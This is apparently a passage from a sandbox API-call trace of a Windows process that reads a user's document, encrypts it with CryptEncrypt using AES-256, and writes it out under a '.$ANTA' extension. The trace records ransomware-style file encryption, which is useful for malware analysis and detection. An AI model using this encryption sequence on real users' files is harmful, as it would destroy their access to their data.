lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.548] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.548] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4370 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.548] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\iwvsvvmxlofdd1.ods.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.551] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.551] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0079.553] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x3f79, lpOverlapped=0x0) returned 1 [0079.554] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.556] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.557] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.557] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.557] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e27b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.557] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.557] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x13f79, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x13f80) returned 1 [0079.558] CharLowerBuffW (in: lpsz="byte[81793]", cchLength=0xb | out: lpsz="byte[81793]") returned 0xb [0079.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb0a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.558] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d5ea0*, pdwDataLen=0x144e538*=0x13f79, dwBufLen=0x13f80 | out: pbData=0x49d5ea0*, pdwDataLen=0x144e538*=0x13f80) returned 1 [0079.561] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.561] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x13f80, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ef3c*=0x13f80, lpOverlapped=0x0) returned 1 [0079.564] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cabf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.564] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0079.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.565] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.565] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0079.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.566] CryptReleaseContext (hProv=0x41a4728, dwFlags=0x0) returned 1 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.567] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.567] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.568] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.568] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0079.568] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.568] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.569] CloseHandle (hObject=0x298) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.569] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 